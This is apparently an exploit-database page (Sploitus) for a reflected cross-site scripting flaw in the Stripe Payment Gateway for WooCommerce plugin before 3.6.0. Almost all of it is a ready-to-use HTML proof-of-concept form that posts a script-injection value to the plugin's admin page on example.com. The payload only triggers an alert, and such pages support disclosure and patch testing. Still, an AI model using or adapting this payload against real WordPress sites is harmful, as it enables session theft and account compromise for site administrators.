Sploitus

Exploit for Stripe Payment Gateway for WooCommerce < 3.6.0 - Reflected Cross-Site Scripting (XSS)

wpexploit Β· 2021-06-07

Exploit Code

MARKDOWN9 lines
## https://sploitus.com/exploit?id=WPEX-ID:878849B7-AC8B-4040-87D7-E3CF48054EEA
<html>
  <body>
    <form action="https://example.com/wp-admin/admin.php?page=eh-stripe-overview" method="POST">
      <input type="hidden" name="page" value='"><script>alert(/XSS/)</script>"' />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>